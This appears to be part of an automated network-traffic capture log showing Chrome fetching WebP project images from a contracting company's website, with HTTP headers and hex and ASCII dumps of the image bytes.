                                              2024-09-27 06:20:21 UTC8000INData Raw: 3e b1 07 2b 97 44 44 67 42 3d c0 e3 d3 fc 0e 07 cc d0 d7 ca f8 46 06 a5 48 9f 85 c1 eb ab 97 78 e1 0e 62 1c d2 d1 7d 82 fc 8e 83 42 93 c2 2a 9f 63 be 46 f5 93 60 7a c2 69 c9 77 b8 7e 98 94 30 ec af f5 45 63 6d a9 16 cd e0 5a d1 c0 f7 2e 27 66 dc 96 96 fa c1 f3 3d c9 3e ce ad e8 b5 20 a6 6e 67 86 e9 18 b9 43 69 5b 2b 57 cc 17 ff 8f 85 23 26 43 60 ed b7 1d d5 e0 ed d1 17 68 e4 e7 81 29 61 b3 71 0d 88 99 33 53 62 3e 39 1f 7d 38 4b 19 6d bd 2b ad 08 54 a8 4a c4 db ee 5d 43 95 19 d5 24 a0 96 a3 55 54 dd 6f 37 49 bc 4a a7 fc f1 fa 59 6d b8 3c 57 a9 e1 cb a0 a0 c3 4d 97 6c 4e aa 11 1b 10 29 9e 13 06 43 ca b8 7a 36 7a 4c 9f 60 12 4f 81 f9 55 a3 f7 46 86 61 5f bc f4 a1 18 39 9f a0 ae 6a 56 cd f5 e7 da 78 f7 e7 28 e6 a4 48 1d 7d 0a 95 ff 58 63 20 41 22 21 0f 01 aa
                                              Data Ascii: >+DDgB=FHxb}B*cF`ziw~0EcmZ.'f=> ngCi[+W#&C`h)aq3Sb>9}8Km+TJ]C$UTo7IJYm<WMlN)Cz6zL`OUFa_9jVx(H}Xc A"!
                                              2024-09-27 06:20:21 UTC8000INData Raw: f2 59 65 fd a7 a8 25 16 29 60 eb e5 9d aa 61 17 f9 4d 93 11 6e 78 45 d4 2b 8b 23 00 2a ff 4b b7 1d 82 e7 33 53 27 0c 1b 4f 1d 9a e2 ac dc 81 0d 53 3a 3d c2 dc 9c 83 46 93 f4 c7 dc 80 53 c8 8e a1 17 08 a4 d8 25 0a 41 61 72 44 39 ae eb 02 36 01 fb e8 77 61 a8 28 6b 56 31 1b 48 a2 df b6 f3 a1 60 d3 0d 17 ad b0 74 6b 10 23 8b cc 4a 54 e8 fb 77 46 e6 ea ac 5e 54 6b f8 22 d2 f2 61 ee 8b 98 b1 d9 c8 d9 3d 56 03 b9 4f a3 eb 90 c6 b0 bd 48 7e 46 ac 46 a1 f9 cb 7f 99 73 2d 06 a7 8a c3 c0 f0 16 bd eb 9e 63 cc 20 a3 7b 7a 5e 92 9b be a3 c8 21 ce 6c 64 49 42 43 b7 aa fd fa 82 3b 94 cd 75 9a 51 79 e9 f0 3b 91 fc 06 15 48 73 89 2f fc b1 b6 2c 8a cb 5d dd 0b d0 30 b1 38 cf a0 e8 18 6b 43 41 1f 7c e4 1a 42 de 9d 48 43 26 53 81 60 d4 dd b9 f7 3b e1 96 99 16 d8 65 32 b7 9b
                                              Data Ascii: Ye%)`aMnxE+#*K3S'OS:=FS%AarD96wa(kV1H`tk#JTwF^Tk"a=VOH~FFs-c {z^!ldIBC;uQy;Hs/,]08kCA|BHC&S`;e2
                                              2024-09-27 06:20:21 UTC8000INData Raw: e4 dc 68 95 78 4a 98 56 d7 82 76 28 58 a7 0b 50 e4 2c 22 c0 cc cc e0 91 39 2c a0 4f 30 3c f7 95 94 41 b8 19 98 87 55 e1 dd ee 3e 82 2e 5b 8f 43 20 aa 5b 01 c8 f5 74 1d b9 c1 1d 3a bc 16 50 e7 7c 79 13 12 dc 94 39 c8 a9 8c 8b ba e3 b1 09 8f fc c2 cb c5 d9 05 05 a8 74 3b 68 8b 48 b4 5d 77 da 82 d1 74 e1 8a 33 85 d3 15 f1 58 f2 f1 b4 d9 a8 e5 49 d9 64 3c 8b 7e ff 72 f4 5a be 91 f4 e7 34 62 19 3c 55 aa a2 33 99 a9 a4 7f a8 0a 95 a7 1b e1 33 a2 a1 32 2e dd 0c 46 e6 f6 ad fe 6c 2c 85 a4 98 dc 50 37 c4 23 8f 50 3b 4f a3 a5 f8 72 85 a6 7c 76 b8 fa e0 ee ea 96 32 e8 98 82 02 8c 45 bc b2 72 ce c6 cc d6 d1 68 94 17 54 f9 c2 4a b1 7c d7 6f ba 7d 6c e4 19 89 fa 72 48 72 58 00 5c 2d 56 a1 60 39 82 04 ae 15 ba e3 a9 3d 78 19 52 5e b0 90 10 d6 e5 8e b0 fa 04 f4 70 d3 25
                                              Data Ascii: hxJVv(XP,"9,O0<AU>.[C [t:P|y9t;hH]wt3XId<~rZ4b<U332.Fl,P7#P;Or|v2ErhTJ|o}lrHrX\-V`9=xR^p%
                                              2024-09-27 06:20:21 UTC2109INData Raw: b9 b5 0a f0 ed 59 98 bf e5 c5 4d f1 82 0e b2 b6 2c 4e b8 9d 18 96 fa 55 5a 25 b6 48 08 4d d2 31 1b 10 e9 17 09 4f 9d 09 62 62 04 de ac 28 1a eb 4f 23 c2 97 9f 51 66 c6 f5 6a 3d e5 45 b4 37 91 46 13 46 6c ee 14 e7 4a e3 5d 9a d7 3e b3 4b c9 05 7f f9 59 d3 5d bc 59 4e cd 70 d4 fd 7f eb 60 4b f4 76 03 bd db 8e 84 1b 6d 03 ae be ba b9 78 21 94 a2 6b 0e 41 24 5f 85 ec 12 69 eb 4b fe 11 e3 e4 7b b5 25 39 7c 14 c2 a3 3f a4 e5 19 9b 6c f4 19 e6 84 41 56 c0 8b e2 9f 5e 5e 53 8e 73 46 f5 09 99 4f 04 94 b2 2b 38 ce d7 6f 16 91 77 48 38 0b 88 7d 5a a9 02 df ca 4d 90 8e 82 d3 b2 26 2e 92 d5 91 57 68 7d fa 9f 67 e7 13 91 52 3c 67 6f 1a a7 d0 45 b2 88 73 80 61 04 58 1c f0 73 16 27 0c b2 3c ea 71 3e 63 e9 3a 53 27 b1 0c 7c b7 e7 8e 71 0a d0 8d 71 b2 57 54 77 e5 14 d7 7f
                                              Data Ascii: YM,NUZ%HM1Obb(O#Qfj=E7FFlJ]>KY]YNp`Kvmx!kA$_iK{%9|?lAV^^SsFO+8owH8}ZM&.Wh}gR<goEsaXs'<q>c:S'|qqWTw


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              122192.168.2.465455173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:20 UTC465OUTGET /uploads/projects/13/ede6b29ab48bcd7727bef37740e56b13.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:20 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:20 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Tue, 10 Jan 2023 09:44:05 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 64982
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:20 UTC7931INData Raw: 52 49 46 46 ce fd 00 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 5a fd 00 00 f0 73 05 9d 01 2a cf 04 a3 03 3e e9 6e af 52 a9 26 29 ab a5 36 2a 71 70 1d 09 65 6e 50 c6 dd 4f 8a c5 db f3 fb 3c b0 f8 66 87 f7 aa ff ea f5 2f e3 2f 38 44 71 f3 7f 2a af 18 5f d4 5f 53 8f 67 df bd 91 51 e4 dc 7a 39 db f5 7c 57 4f e3 fe b7 68 0f fa bd 46 bd 6f 38 3d d1 ed 6f b1 35 c3 f6 cf db bf fb e9 d7 9b d7 63 e8 2f ee 1f f2 79 fc ff f5 ec a3 fd 67 ff cf 5b 8e 97 3f dd 7a 1d f7 63 bd 74 3f 9b f4 e4 fa f3 7f bc c8 f5 fa 4f 96 df a6 7f 8f e0 6f e9 9e f8 1f d0 fb 7a 60 2f e6 3c 1e fe db fb d3 fe 9e bf 3b 5b fe 1f fc 0f 41 af d8 3f 7d 7a b7 ff 57 76 ae ff e6 3b f0 e7 bf fe 9a 93 86 fa cb 50 3f dc ef 55 7c 48 7f 41 e8 b9 e9 27 ff a7 ef 77 ac 3f
                                              Data Ascii: RIFFWEBPVP8XVP8 Zs*>nR&)6*qpenPO<f//8Dq*__SgQz9|WOhFo8=o5c/yg[?zct?Ooz`/<;[A?}zWv;P?U|HA'w?
                                              2024-09-27 06:20:20 UTC8000INData Raw: d5 2d f4 db f3 be 55 e7 69 dd 13 06 93 1f 48 59 66 de bd 3f 48 7c 06 80 53 e0 c6 23 ec ea dd 32 88 4b f3 3a be d4 87 68 b9 e9 1c 2b 61 a9 64 c3 48 6a f3 46 95 1b e5 e8 09 cc 5f 7a 98 ea 69 8d 63 fc f6 10 13 05 ea ab 03 31 64 c6 eb 0f e8 dc e2 63 7b 31 ed d6 c7 56 d4 da 3f 89 a7 11 f9 18 91 1f 75 28 5d 36 24 2d 1a 90 3b 10 b2 2f 66 40 35 ab 4a 77 89 2a ed 07 55 d9 ff 9f 19 99 7d 28 c4 2b 01 06 e3 1c f3 1c b9 ba ed ca 87 36 42 8b 64 aa 03 1e 3b 6e 0e f6 46 64 cd 89 7e a8 e1 c2 40 e1 6e 07 8f 9c 37 63 70 d4 b6 4e 16 be f6 9a f1 e3 a8 20 f1 a4 43 06 4b a0 5f 27 25 b3 5a aa c5 e8 7f 35 6c b2 27 78 77 39 78 76 23 06 12 26 3d 3a b2 61 f0 d4 47 1e c6 99 23 45 c1 6b 30 9d 10 b5 a5 68 42 e6 55 a8 58 63 41 28 69 44 6f 28 b9 8d 9d d4 71 31 02 0b 3f b6 70 14 71 72 78
                                              Data Ascii: -UiHYf?H|S#2K:h+adHjF_zic1dc{1V?u(]6$-;/f@5Jw*U}(+6Bd;nFd~@n7cpN CK_'%Z5l'xw9xv#&=:aG#Ek0hBUXcA(iDo(q1?pqrx
                                              2024-09-27 06:20:21 UTC8000INData Raw: 68 52 64 24 64 b6 6e 64 0c 2d 9a 1c 8c f1 fc 51 ca 2c 9a 95 1a 36 a1 fe d0 3f c1 bc 3d e0 c9 92 2f 7b 0b 48 7a d3 e3 de c3 ef 67 28 4d 08 bb 83 aa b2 35 76 fc 17 7b 0d ab 3a a1 d2 cb 54 a4 b6 d4 6d a7 cc d7 96 80 e8 e2 b8 43 d4 a9 73 a7 61 27 dd 49 83 37 fd 24 d1 23 29 ec 26 29 e8 ac 5a 0a 80 51 2e ce e3 4c c3 8f 81 5c 21 2f 85 e1 5c 7a 92 64 73 38 8e bf 00 3c fd 1e 17 84 8f 09 8b 1c 29 68 d4 c5 f5 cc e9 0d e3 e2 7f c0 bc 20 2e 53 f6 a8 28 75 90 8b 9c c3 48 b1 1d 3e fc d8 83 49 3c 63 cd e2 d5 a1 4b b7 c4 01 a1 5a c6 e2 22 df 99 b0 46 6a fc c2 6e d9 c1 16 2c 97 db be eb ac 67 b6 20 ca ca 03 0f 0d a1 cf 60 98 53 ee a4 ae cc 10 17 8d b9 b3 bc 5e 08 de 32 d0 68 1c 96 de 44 f5 79 43 36 ba a2 ec a6 0f 41 a6 5c bd ba bf f3 c2 2b 9f 08 6b d2 cf 14 db d0 8e 80 07
                                              Data Ascii: hRd$dnd-Q,6?=/{Hzg(M5v{:TmCsa'I7$#)&)ZQ.L\!/\zds8<)h .S(uH>I<cKZ"Fjn,g `S^2hDyC6A\+k
                                              2024-09-27 06:20:21 UTC8000INData Raw: 84 39 2e 38 97 b8 ec 0c 8c 07 33 b0 17 aa af 64 26 84 37 0d 4c 6d 7b 0f 4d 89 e1 6d 85 52 89 11 21 0a b1 40 00 15 94 d9 c8 a9 0e 27 8a e0 b3 40 8f 90 30 0a e3 c5 6e 6b 0d 7e 03 84 f2 bf 7b 41 09 3f 89 90 b9 71 32 40 e3 fb 86 f5 94 0d b4 7f ea fe 46 d9 ce 2c 62 0d 02 e9 d4 ae b7 10 28 ea d6 2d d9 8b 39 1f 5f b0 cf 49 31 e4 a4 23 33 fb 7d 50 19 c0 3b 8c b2 98 ff a6 7e 6e 2e 1d bf 14 19 e5 b3 0f bc 7e 44 69 0e ba d4 86 20 bb 09 ee ac d8 8c be 86 55 1d 38 2c 1d c4 32 15 c4 f9 18 25 16 e8 ae b2 ef d4 ed 15 c3 ba 81 8d 4c 6c 6d 19 2b d1 1f 81 16 ea 0d d5 3f 31 b4 96 99 ba 08 06 6a 55 d2 50 61 43 1c 6a 13 21 89 b2 c5 d4 87 4e 5c 96 db 98 f2 d8 27 a8 13 44 a1 25 a3 5a 99 e8 45 7d 83 a7 00 be af 07 24 a2 36 52 ba 3a ad fe fd d6 34 68 78 16 d6 dd 5f f2 e8 8d 0a 7d
                                              Data Ascii: 9.83d&7Lm{MmR!@'@0nk~{A?q2@F,b(-9_I1#3}P;~n.~Di U8,2%Llm+?1jUPaCj!N\'D%ZE}$6R:4hx_}
                                              2024-09-27 06:20:21 UTC8000INData Raw: 26 03 71 c2 52 f8 f7 23 fa 5a f3 e6 db 26 0b cb ee 76 2c ac 32 13 97 9c 3b 31 f0 a2 0e 34 6b 10 51 e2 b1 e5 0d 1b 50 e2 2f 39 da 46 6a ba 6c a6 eb 4f d8 8a fe d8 52 22 20 b7 49 4d ad 3e b6 8c 69 43 1b 0a 4a f9 1e 8c 2d 2f 07 98 48 c9 53 7c a9 9b b2 67 9a 78 5f db a1 7e 02 56 57 66 f7 d8 3d 9f cf 40 61 be 98 52 42 0b 57 b4 57 1a e2 e8 c8 0a dd 8d 62 87 5e e6 65 4d ab 73 0e 76 2b 96 ec d0 66 c0 af e6 08 ad 3b 50 3a 0c cc f9 de 86 8c 0b b2 63 1f 6c 8d ce 14 6c d9 ef 67 d0 ae 4a c3 ef 91 3d 62 c8 96 12 35 86 f6 3e 8c 70 d1 52 08 56 3a ed b4 2a 54 38 c9 f3 23 fb be d9 da 9b c0 48 04 50 a1 a7 fd ef 4a 6c c7 8a 69 d4 84 10 d7 3c 84 12 2d 31 00 9e ff 1b 45 62 7d 39 77 7d 2b 6e 7c 23 94 75 cf 0e 7e 1b bd cb 36 66 3f 1c 33 f5 25 68 26 38 83 0f 58 67 06 61 8c e5 e9
                                              Data Ascii: &qR#Z&v,2;14kQP/9FjlOR" IM>iCJ-/HS|gx_~VWf=@aRBWWb^eMsv+f;P:cllgJ=b5>pRV:*T8#HPJli<-1Eb}9w}+n|#u~6f?3%h&8Xga
                                              2024-09-27 06:20:21 UTC8000INData Raw: 00 70 f4 70 a9 8b f1 83 71 23 fb 53 82 7a 60 48 64 14 eb f1 be 97 21 82 61 e3 4a 09 01 48 f2 a6 c6 93 ef 4e b7 48 38 79 61 83 7c c9 e0 d7 d8 a3 0a ea 49 ef 20 0b d7 0d 78 8b 7f bc 68 be f2 b0 16 6f 2d 6f 61 a9 da 24 d8 07 ef 1c 30 f7 c8 22 c5 98 f6 26 c5 1b 28 3d b6 bf d5 2e 73 86 e6 e1 c5 06 53 6b 56 89 40 4a 7f 0a 20 4f 79 90 0e d9 2c 83 b8 18 62 95 5d 55 48 ce 08 a9 c0 79 3c 82 f3 ef 97 86 fc 11 a7 3f 16 e5 ad c1 26 44 de df cc 70 5f f3 27 91 8e 04 03 e8 29 43 cf 2c 52 f8 ef 50 d2 cb e4 e6 6a ee e7 42 e4 44 cb 4b c8 d6 2e fa 95 3b a6 b5 de 59 85 8a 73 87 2a ae 30 b1 49 23 45 b5 92 15 1c 11 21 9a bc 5f eb 61 bb 4e d0 26 3b 6a 7e 3c 74 bf cc 0d 4d 71 60 19 16 30 0b 09 08 ed 3f 93 ab ac 15 18 63 37 36 9f 0c 61 2d 7a 4a 26 40 40 ce c6 1e 1d 2c 3f 52 e3 a2
                                              Data Ascii: ppq#Sz`Hd!aJHNH8ya|I xho-oa$0"&(=.sSkV@J Oy,b]UHy<?&Dp_')C,RPjBDK.;Ys*0I#E!_aN&;j~<tMq`0?c76a-zJ&@@,?R
                                              2024-09-27 06:20:21 UTC8000INData Raw: 13 bb 14 00 03 ad 34 a6 2f 0e 9b ae 96 ac 34 73 21 74 72 c1 47 7a 74 e0 0c 5c 41 52 56 4d 92 d2 41 51 39 95 65 31 c3 b4 c1 50 16 cd 3d 3b c0 9a f7 9c c2 8e c9 e8 87 d8 88 09 ad 73 b7 9b 7f c6 d6 1b b2 62 a5 78 6d fe c3 20 56 31 af 60 8a 1f a5 de 09 05 e7 26 22 f0 f2 ab 4a e4 ab de 9d ba aa 4c 3a 8c cf 42 21 57 07 29 51 78 a3 fa 5b 4d 53 91 78 6e 0a 59 02 f6 72 a8 0b b8 5c d1 52 29 50 3c 61 13 65 ce 6e 1a 25 25 ac 25 eb d1 f7 46 b2 b0 72 5c 5c 3b f4 61 00 58 06 07 18 a5 a4 6a e0 09 82 4d d2 16 1b dc 23 27 4d be 67 81 71 58 bb 77 88 ab c0 25 ee 59 17 72 af 05 93 b7 d4 cb f2 d8 5e af 3a b2 87 fb 97 de bd 73 7c 67 a2 37 51 4d 4b 49 d8 6d c9 02 24 b2 90 2c 17 35 df 65 24 2e f9 bd 8f c8 c3 39 87 46 66 ff d5 38 e9 f7 ec c7 7d 8e 82 a8 0f f3 44 cc e3 a1 5b 0a d3
                                              Data Ascii: 4/4s!trGzt\ARVMAQ9e1P=;sbxm V1`&"JL:B!W)Qx[MSxnYr\R)P<aen%%%Fr\\;aXjM#'MgqXw%Yr^:s|g7QMKIm$,5e$.9Ff8}D[
                                              2024-09-27 06:20:21 UTC8000INData Raw: 8e 4c 4e 13 29 0a 7c f0 de 2d a6 52 31 67 ea 71 41 6d 57 b8 42 16 7d 20 c2 4f fe 02 67 44 71 91 db 01 35 66 c7 77 f7 9a f7 11 7d db 01 66 02 3d f2 f1 12 16 74 cd 4c f8 9b b5 ee d5 92 46 20 57 48 67 8a df f9 d5 6f df 9d fc 5d df 16 32 e9 15 6b d8 c1 c0 f1 62 76 a7 db 7b 84 8e 1d d0 a4 d2 7d ab 70 6b 39 5c c6 6e f6 ba a5 91 d9 90 73 08 8e 6c ff ca a1 13 53 ab e4 7d e3 7e 53 23 d2 bf 90 24 b5 c1 20 77 b7 d8 3b d4 bc 27 a1 33 47 e1 e9 84 96 e1 9e 19 54 0d 5a 97 fa be d6 a5 f5 50 65 29 92 f0 30 26 28 4c 85 41 d9 ff 76 34 ea 36 07 7d 6f db 79 39 76 ce 15 ad bb 1d c8 09 fe 88 70 fe 69 e1 b6 19 aa c0 95 60 c3 c2 a8 62 37 04 c9 36 74 28 7c b3 03 e6 06 c0 af 2d 78 c5 c0 11 3f 77 55 00 02 a9 b2 18 9a 5b d0 47 a7 fa b5 39 71 a8 ba 87 6f bd 2b 8d 0c 79 41 6d 9d 9a be
                                              Data Ascii: LN)|-R1gqAmWB} OgDq5fw}f=tLF WHgo]2kbv{}pk9\nslS}~S#$ w;'3GTZPe)0&(LAv46}oy9vpi`b76t(|-x?wU[G9qo+yAm
                                              2024-09-27 06:20:21 UTC1051INData Raw: e7 77 90 64 1a 94 bd 06 82 48 ad 1d 1c 55 07 0f fa a8 f6 fc 9f 3a 59 9b 8b 10 10 6f f0 b1 35 07 7c a6 b6 29 83 20 1d 76 e7 49 3b 5e 7e 7d c1 bb 41 7a 76 09 5a 6d a6 b5 71 ea d8 02 12 79 2d bc e2 54 0d 89 41 e4 5e 6e b6 b1 bb c0 1f ab 90 4c 16 cf 50 d4 c7 fc 69 de 6d 9e 4a 39 ed c2 e5 0e 75 38 66 83 5d 2c 20 57 83 c7 e8 01 42 d6 d8 2e 2d 89 55 90 35 d8 0e 7c c7 19 b2 9a f8 e7 e4 22 eb 02 e2 68 a4 91 41 27 fb 9a 35 c1 20 8a a8 e0 5b b0 0f c5 cc aa 30 b1 e7 40 96 c9 0d 01 0c 64 de 61 6c ae 43 d1 2b 63 a5 fc 88 b4 fc d3 69 d2 14 0a 79 05 a9 8d 35 22 9b 00 3a 2d 50 f8 c2 a4 69 11 40 36 58 48 1b 3a 1c 12 92 71 ad a7 52 e0 4b ed de f5 ba 18 9f ec e0 0f b1 d4 15 82 5a b6 70 29 20 6e 88 01 1f 00 09 14 9e 88 f7 30 13 b3 70 b7 6f 9f 1e 89 8d 33 b7 b3 3a 44 22 61 ec
                                              Data Ascii: wdHU:Yo5|) vI;^~}AzvZmqy-TA^nLPimJ9u8f], WB.-U5|"hA'5 [0@dalC+ciy5":-Pi@6XH:qRKZp) n0po3:D"a


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              123192.168.2.465458173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:20 UTC465OUTGET /uploads/projects/11/dc8d49617e8c915bd5328fa315b82453.webp HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:20 UTC261INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:20 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Wed, 11 Jan 2023 14:30:52 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 67992
                                              Connection: close
                                              Content-Type: image/webp
                                              2024-09-27 06:20:20 UTC7931INData Raw: 52 49 46 46 90 09 01 00 57 45 42 50 56 50 38 58 0a 00 00 00 00 00 00 00 ce 04 00 a2 03 00 56 50 38 20 1c 09 01 00 b0 6d 05 9d 01 2a cf 04 a3 03 3e e9 6c ae 52 29 2b 33 3b 26 34 0a fb 60 1d 09 63 6e 50 bc 39 75 f1 fb 7e b8 7f e6 67 20 f1 a7 f8 39 ab ff 97 6b 0f 46 f9 5b 78 d7 fe be 49 0c 68 57 06 3d 4b 6d ee f4 f7 e8 78 d7 f9 be 6e 15 2b 6b f0 11 fa 8f f1 e8 b2 f7 ca 6d 3c b2 fb 7f 2d ff 8d ef 73 ff 6f d7 6f f4 ef f3 5f f9 ff 3f fe 64 fd 0b ff e2 f6 4f fd 47 ff 77 ab 4f e8 5f f2 bd 67 fd 40 7f aa df b9 fe f3 ea c1 e7 57 eb 73 fd e7 d5 97 4b bb e7 ff f9 bc f3 fd 27 b1 7f d0 fb 0b 70 57 f4 de 0c ff 60 fe 49 9e 9f f2 bc 17 fd 9b f8 af d9 cf 62 0f d9 bc 93 3f 5b f6 f7 c2 23 5f ff 93 fb 81 ec 1d ed 9f dd 7d 07 ff 53 ce 7f ea 7f dc 7b 02 f9 c5 e2 dd f7 af fd 7e
                                              Data Ascii: RIFFWEBPVP8XVP8 m*>lR)+3;&4`cnP9u~g 9kF[xIhW=Kmxn+km<-soo_?dOGwO_g@WsK'pW`Ib?[#_}S{~
                                              2024-09-27 06:20:20 UTC8000INData Raw: cd 4d df 49 94 7a 8d b6 b7 bf d1 3f 67 74 b0 ea f5 e0 59 0e b4 28 3d 5c 2c ce fa 15 6c c0 52 08 ed 11 2a b2 2c b5 90 bc 93 cb 56 b3 74 ef 48 7d 58 da de 17 60 12 55 65 2d d7 e4 25 1a 83 35 48 6d c0 19 e3 3b d8 11 04 98 45 9d 53 32 eb ef 94 8f 38 00 31 3f 8c b1 60 6c 11 2b 20 c9 4c c4 59 ac b1 97 4e 9c 17 1f bc df b8 c2 df 31 77 af b6 e3 d0 b0 46 c8 b8 bf be 9d 7c ae 60 61 a1 0d 56 c6 2b bb f1 66 4f 8e 41 2f 06 73 80 4b 68 a1 76 66 df 05 57 9f d4 dc 7f 15 3d 48 57 f8 7f 5b 47 4b 22 73 2f 40 9f da 94 e6 00 75 ce 88 8b e9 11 f3 a4 64 e1 a0 a2 f6 90 18 53 3c 19 87 62 0f 90 27 9f 2f 71 ce 6a 8a 29 a6 73 0a 60 12 21 9e 83 b5 15 c8 3e 8a 95 43 74 c0 ab 37 d6 32 69 c6 58 67 78 4f 19 c2 a4 72 c4 70 fd ed 8c 91 dc 03 25 38 0a a7 1b 38 65 6c 2d d6 cf 2b 56 5e 52 1f
                                              Data Ascii: MIz?gtY(=\,lR*,VtH}X`Ue-%5Hm;ES281?`l+ LYN1wF|`aV+fOA/sKhvfW=HW[GK"s/@udS<b'/qj)s`!>Ct72iXgxOrp%88el-+V^R
                                              2024-09-27 06:20:21 UTC8000INData Raw: 6e 72 10 fc 00 0f bf 3b e6 ae df c7 dd 2a c6 c6 d1 59 37 8c 62 30 c9 bd 62 2b 44 63 6c 61 f0 b2 b2 10 18 ec 82 28 2d ae 0b fc 7c 4d 95 84 66 1e 1a 77 c0 bb 2c 9e b1 84 7d 9a df 55 fa ac 51 c2 cf ac b8 49 a2 ab 35 bc 32 44 2e e0 c0 49 2d a4 31 29 45 fa f8 ef ce 3a bf 4c 14 6c e8 5d ed 85 c5 23 8d 78 6f 8c 3b fd 12 cd a7 02 76 b0 aa cd 90 c2 34 96 ce 58 a6 ad 22 9c 08 71 fe 81 3e ce 6f 28 a6 1d a1 2d 0a 12 5c 03 2a f8 30 93 00 bd 29 62 59 e0 22 d0 85 b3 28 43 84 d5 7e 3c f7 99 cb f0 15 96 f2 76 8a cb 6f 83 0b 09 6f 55 93 4f cf 98 68 74 29 ce 63 53 e3 53 71 fc 5c d4 36 17 d2 bb 3d f6 6a 99 6e 9d 52 e4 da 1f cc 92 d2 d5 b1 e6 5d a2 f0 12 0b 99 48 07 85 7d 62 de d7 a0 65 4b 2f 61 5d 0e 3f b3 fb b1 11 af c7 4d 82 71 49 11 d0 c5 9b ab 5c 05 d0 c2 90 d6 0c 83 9f
                                              Data Ascii: nr;*Y7b0b+Dcla(-|Mfw,}UQI52D.I-1)E:Ll]#xo;v4X"q>o(-\*0)bY"(C~<vooUOht)cSSq\6=jnR]H}beK/a]?MqI\
                                              2024-09-27 06:20:21 UTC8000INData Raw: d6 66 d9 47 7d 3d 4a e5 d5 e9 62 f4 da a2 ca a1 70 fd 29 69 a8 4c 60 01 ec 05 d4 ba db df d2 bb 73 30 06 e4 3c 59 93 23 a8 4b 44 f1 86 63 02 a8 9d 9a 35 33 c9 77 7b 64 2b dd fc f3 aa 7e 1d 23 ac d8 3a 5f 53 2c b9 c8 10 f6 ec be 1a 60 42 de 47 0b 89 c2 05 ef 59 f2 0e e8 47 86 58 c5 ef 58 4e 89 1b f2 93 6a 5c 5a 3d 0c 3a 1b d2 d0 73 83 b9 81 65 e1 64 76 4f a6 db b8 c6 fc 01 dd c4 85 4a ca c8 b4 98 64 7e 83 f3 9a 12 9f 33 ca 0b 52 36 43 66 4a 22 89 7b 3d 22 80 85 0b cb 10 06 65 b8 ba f3 c7 f2 07 2a eb 1f 2b 03 c7 de f3 2d f4 18 b0 8e e1 55 f1 61 b4 ca dc f8 35 7e 2d 8f db 67 8d a5 13 60 3e d7 6d 71 80 36 c2 2c aa 6f c6 85 a1 aa a8 0e 59 cb cc fd 5f 50 1a 41 55 bf a7 76 ea f4 9f f2 84 bd 89 83 39 d7 31 d7 10 74 fc 82 be 45 b6 46 51 d3 3b 91 30 60 ce 83 75 54
                                              Data Ascii: fG}=Jbp)iL`s0<Y#KDc53w{d+~#:_S,`BGYGXXNj\Z=:sedvOJd~3R6CfJ"{="e*+-Ua5~-g`>mq6,oY_PAUv91tEFQ;0`uT
                                              2024-09-27 06:20:21 UTC8000INData Raw: 9e 55 62 02 4f 8b e3 1a 22 24 ad 4c 4f ae f7 34 1e 34 89 e8 7b c2 7b 5f f6 f6 f3 bd 47 a7 1e ac 21 91 c3 e9 d8 26 70 84 e9 19 81 87 d5 24 30 17 cf 63 b5 0f 82 df 43 e6 92 02 b1 a6 a8 2f c9 43 40 68 9b d7 03 35 b6 a4 0a 49 be f2 5a 3b 23 54 bb 58 1a a3 16 0b 34 fd db c9 34 cf e6 eb 81 e8 62 cf 8f d0 37 99 75 cf 4d 42 e9 4d c4 61 bb d4 78 89 0b f5 af ea c1 99 ea ac df 6f 31 41 b1 97 00 90 f8 f9 75 57 0f c3 92 08 6e 89 5e 35 b7 7a 2d 61 6f 3b 8b ca a7 50 69 d9 0b 73 86 59 56 41 59 1b b5 45 be 9a 72 45 c1 24 99 d5 bb 98 c5 e4 65 d9 fe a2 75 83 28 f9 4e 2e 26 87 05 dc ef 3f ab 1d f5 ea 85 53 7f 81 77 fa 63 d0 44 34 8a 5b 07 ee db cd 84 f2 0a 83 4f 67 e2 83 31 30 ec dd 12 ef 88 77 01 a7 43 2a e5 b1 5c 2a 2c 05 dc cd 13 dc 3c 63 a1 f9 eb 22 32 22 2c 80 87 3d c9
                                              Data Ascii: UbO"$LO44{{_G!&p$0cC/C@h5IZ;#TX44b7uMBMaxo1AuWn^5z-ao;PisYVAYErE$eu(N.&?SwcD4[Og10wC*\*,<c"2",=
